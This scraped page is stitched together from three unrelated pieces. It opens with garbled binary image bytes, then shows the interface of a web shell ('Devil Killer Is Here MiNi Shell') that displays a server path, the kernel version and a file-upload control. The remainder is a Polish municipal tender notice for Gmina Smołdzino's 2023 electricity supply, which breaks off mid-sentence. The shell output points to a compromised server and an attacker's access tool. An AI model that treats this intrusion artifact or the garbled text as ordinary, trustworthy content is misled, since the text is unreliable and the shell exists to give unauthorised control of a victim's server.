JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221019/0040078201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Gmina Smołdzino. Kompleksowa dostawa energii elektrycznej do obiektów użyteczności publicznej w okresie od 01.01.2023r. do 31.12.2023r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Smołdzino</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Smołdzino</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000551763</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tadeusza Kościuszki 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Smołdzino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-214</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598117215</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@smoldzino.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.smoldzino.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Gmina Smołdzino. Kompleksowa dostawa energii elektrycznej do obiektów użyteczności publicznej w okresie od 01.01.2023r. do 31.12.2023r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2c66bfb1-4fcb-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00400782</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00205747/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Kompleksowa dostawa energii elektrycznej do obiektów należących do Gminy Smołdzino</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.smoldzino.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, z<br/>zastrzeżeniem, że złożenie oferty oraz oświadczeń następuje wyłącznie przy użyciu miniPortalu.<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów<br/>stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>5. Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP. Za datę przekazania<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań<br/>dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci<br/>papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres poczty elektronicznej<br/>Zamawiającego wskazany w pkt 9 swz.<br/>6. Dane postępowania można wyszukać również na Liście wszystkich postępowań klikając wcześniej<br/>opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na miniPortalu.<br/>7. Ofertę, sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>8. Złożenie oferty:<br/>a) Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego na miniPortalu. Formularz Oferty jest dostępny dla<br/>wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://bip.smoldzino.com.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE z 119 z 04.05.2016, str. 1), dalej zwanego „RODO”, Zamawiający informuje, że:<br/>-administratorem danych osobowych jest Zamawiający, który prowadzi operacje przetwarzania danych osobowych;<br/>-inspektorem danych osobowych u administratora jest. Roman Borowski, e-mail:roan@pro.onet.pl;<br/>-dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>-odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 oraz art. 74 ustawy Pzp;<br/>-dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>-obowiązek podania przez Wykonawcę określonych danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego -konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>-w odniesieniu do danych osobowych, decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>-osoba zainteresowana posiada prawo: dostępu do swoich danych osobowych (art. 15 RODO), do sprostowania danych osobowych (art. 16 RODO), żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (art. 18 RODO), do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO;<br/>-osobie zainteresowanej nie przysługuje prawo: do usunięcia danych osobowych(w związku z art. 17 ust. 3 lit. b, d lub e RODO), prawo do przenoszenia danych osobowych (o którym mowa w art. 20 RODO), sprzeciwu (wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO) -art. 21 RODO;<br/>Każdy Wykonawca zainteresowany niniejszym postępowaniem (złożeniem oferty) musi wypełniać obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP1.271.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest kompleksowa dostawa (obejmująca dostawę i świadczenie usług dystrybucji) energii elektrycznej do 53 PPE o łącznym szacowanym wolumenie 257444 kWh.<br/>2.	W 21 obiektach zamontowane są (lub będą do 31.03.2023r i do 31.08.2023r.) mikroinstalacje, a odbiorcy mają (będą mieć) status Prosumenta.<br/>3.	Szczegóły dotyczące zużycia energii elektrycznej w poszczególnych punktach poboru, informacje nt. parametrów dystrybucji oraz zamontowanych mikroinstalacji opisane zostały w Załączniku nr 1 do SWZ Wykaz punktów poboru.<br/>4.	Wskazana w pkt 1 szacowana ilość energii, to ilość jaką zamawiający zamierza nabyć i nie obejmuje energii wyprodukowanej we własnym zakresie.<br/>5.	Realizacja zamówienia odbywać się będzie zgodnie z przepisami ustawy Pe.<br/>6.	Wskazane powyżej prognozowane zużycie energii elektrycznej ma charakter orientacyjny i może odbiegać od faktycznie pobranej, w okresie trwania umowy, ilości energii. Zmniejszenie lub zwiększenie ilości energii elektrycznej nie pociąga dla zamawiającego (odbiorców) żadnych konsekwencji, poza koniecznością dokonania zapłaty za faktycznie pobraną ilość energii oraz usługi przesyłu zgodnie z obowiązującą Taryfą OSD. Wykonawca winien uwzględnić wahanie poboru na poziomie (+/-) 15%.<br/>7.	Standardy jakościowe dotyczące energii elektrycznej<br/>1) Przedmiotem zamówienia są dostawy i dystrybucja energii elektrycznej o określonych, zgodnie z obowiązującymi przepisami, standardach jakościowych.<br/>2) Standardy jakościowe energii elektrycznej opisane są w ustawie z dnia 10 kwietnia 1997r. –Prawo energetyczne oraz w Rozporządzeniu Ministra Gospodarki z dnia 4 maja 2007r. w sprawie szczegółowych warunków funkcjonowania systemu elektroenergetycznego (Dz.U. 2007 r. Nr 93, poz. 623 ze zm.). Zasady kształtowania i kalkulacji taryf oraz rozliczeń w obrocie energią elektryczną określa Rozporządzenie Ministra Energii z dnia 6 marca 2019 r. (Dz.U. 2019 r., poz. 503 ze zm.);<br/>3) Standardy dotyczące dystrybucji energii elektrycznej zawarte są w Taryfie Operatora, która określa:<br/>a) grupy taryfowe i szczegółowe kryteria kwalifikowania odbiorców do tych grup;<br/>b) sposób ustalania opłat za przyłączenie do sieci Operatora, zaś w przypadku przyłączenia<br/>do sieci o napięciu znamionowym nie wyższym niż 1 kV także ryczałtowe stawki opłat;<br/>c) stawki opłat za świadczenie usługi dystrybucji i warunki ich stosowania, z uwzględnieniem<br/>podziału na stawki wynikające z:<br/>•	dystrybucji energii elektrycznej (składniki zmienne i stałe stawki sieciowej),<br/>•	korzystania z krajowego systemu elektroenergetycznego (stawki jakościowe),<br/>•	odczytywania wskazań układów pomiarowo-rozliczeniowych i ich bieżącej kontroli (stawki abonamentowe),<br/>•	przedterminowego rozwiązania kontraktów długoterminowych (stawki opłaty<br/>przejściowej),<br/>•	zapewnienia dostępności energii elektrycznej ze źródeł odnawialnych w krajowym systemie elektroenergetycznym (stawka opłaty OZE),<br/>•	zapewnienia średnioterminowego i długoterminowego bezpieczeństwa dostaw energii elektrycznej do odbiorców końcowych (stawka opłaty mocowej);<br/>d) sposób ustalania bonifikat za niedotrzymanie parametrów jakościowych energii<br/>elektrycznej i standardów jakościowych obsługi odbiorców;<br/>e) sposób ustalania opłat za:<br/>•	ponadumowny pobór energii biernej,<br/>•	przekroczenia mocy umownej,<br/>•	nielegalny pobór energii elektrycznej,<br/>f) opłaty za usługi wykonywane na dodatkowe zlecenie odbiorcy;<br/>g) opłaty za wznowienie dostarczania energii elektrycznej po wstrzymaniu jej dostaw. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09310000-5 - Elektryczność</p> <p class="mb-0">65310000-9 - Przesył energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Podstawą obliczenia ceny ofertowej jest Formularz oferty (Załącznik nr 2 do SWZ) wraz z Formularzem cenowym (Załącznik nr 2a do SWZ).<br/>2.	Wykonawca może złożyć Ofertę na własnym formularzu, lecz jej treść i układ muszą być zgodne z formularzem załączonym do niniejszej SWZ.<br/>3.	Cena podana w Formularzu oferty stanowi cenę brutto, tj. cenę oferty netto powiększoną o stawkę podatku od towarów i usług (VAT) 23%.<br/>4.	Sposób obliczenia ceny Cenę oferty netto (Cnetto)należy obliczyć wg wzoru:<br/><br/>Cnetto = Zee + Dc<br/><br/>Zee – całkowity koszt zakupu energii elektrycznej netto stanowiący iloczyn ceny jednostkowej energii elektrycznej (uśrednionej, bez odnoszenia do poszczególnych grup taryfowych) i całkowitego prognozowanego zużycia energii elektrycznej w okresie trwania umowy [zł] bez wyodrębniania poszczególnych grup taryfowych<br/>Dc – całkowite koszty dystrybucji netto w okresie trwania umowy [zł]<br/>5.	W części dotyczącej dystrybucji energii elektrycznej wykonawca wpisuje stawki i opłaty zgodnie z Taryfą OSD zatwierdzoną Decyzją Prezesa URE i obowiązujące na dzień złożenia oferty.<br/>6.	Cena jednostkowa energii elektrycznej zaoferowana przez wykonawcę powinna uwzględniać zysk wykonawcy, oraz wszystkie inne koszty (w tym opłaty handlowe, koszty bilansowania, podatek akcyzowy) związane z realizacją przedmiotu zamówienia określonego w niniejszej SWZ, jak również możliwe odchyłki wielkości poboru energii elektrycznej.<br/>7.	Cena jednostkowa energii elektrycznej zaoferowana przez wykonawcę będzie niezmienna przez cały okres realizacji umowy (z zastrzeżeniem zapisów Załącznika nr 7 do SWZ).<br/>8.	W trakcie trwania umowy, w odniesieniu do usług dystrybucji, obowiązywać będę stawki<br/>wynikające z zatwierdzonej przez Prezesa URE Taryfy OSD. W przypadku zmian stawek, opłat w związku ze zmianą Taryfy OSD, do rozliczeń stosowane będą stawki obowiązujące na dany okres rozliczeniowy. Zmiana stawek i opłat w tym zakresie nie będzie stanowić zmiany Umowy wymagającej podpisania Aneksu.<br/>9.	Zamawiający przewiduje rozliczenie tylko w polskich złotych.<br/>10.	Cenę oferty należy podać do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu w zakresie:<br/>a) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>b) sytuacji ekonomicznej lub finansowej<br/>c) zdolności technicznej lub zawodowej<br/>2. Wykonawca spełni warunek udziału w postępowaniu dotyczący uprawnień do prowadzenia<br/>działalności gospodarczej jeżeli wykaże:<br/>1) posiadanie uprawnień w zakresie obrotu energią elektryczną, tj. posiadanie ważnej Koncesji<br/>w zakresie obrotu energią elektryczną wydanej przez Prezesa Urzędu Regulacji Energetyki<br/>oraz<br/>2) posiadanie uprawnień do prowadzenia działalności gospodarczej w zakresie dystrybucji<br/>energii elektrycznej, tj. posiadanie ważnej Koncesji w zakresie dystrybucji energii elektrycznej<br/>wydanej przez Prezesa Urzędu Regulacji Energetyki, lub jeżeli wykonawca nie jest właścicielem<br/>sieci dystrybucyjnej, posiadanie ważnej Umowy dystrybucji dla usługi kompleksowej zawartej z<br/>Operatorem Systemu Dystrybucyjnego na świadczenie usług dystrybucji energii elektrycznej na<br/>obszarze, na którym znajdują się punkty poboru opisane w Załączniku nr 1 do SWZ, w tym w<br/>zakresie dystrybucji energii elektrycznej wytworzonej w mikroinstalacji.<br/>Warunek zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej.<br/>3. Warunek dotyczący sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w<br/>powyższym zakresie.<br/>4. Wykonawca dotyczący zdolności technicznej lub zawodowej,Zamawiający nie stawia warunku<br/>w powyższym zakresie.<br/>5. Zgodnie z treścią art. 117 ust. 2 ustawy Pzp warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt 2 powyżej, jest<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i to on zrealizuje kompleksową dostawę energii elektrycznej (wg wzoru stanowiącego<br/>Załącznik nr 4 do SWZ. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają do oferty oświadczenie, z którego wynika, który z wykonawców<br/>realizować będzie przedmiot zamówienia.<br/>6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>7. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>8. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi<br/>stosunków prawnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. Podmiotowe środki dowodowe żądane w celu potwierdzenia braku podstaw wykluczeniu (składane<br/>na wezwanie zamawiającego).<br/>W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie<br/>zamówienia publicznego, zamawiający żąda Oświadczenia o aktualności informacji zawartych w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego wg wzoru stanowiącego Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe żądane w celu potwierdzenia spełniania<br/>warunków udziału w postępowaniu składane (składane na wezwanie zamawiającego) w terminie nie<br/>krótszym niż 5 dni od dnia wezwania:<br/>1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu w zakresie<br/>uprawnień do prowadzenia 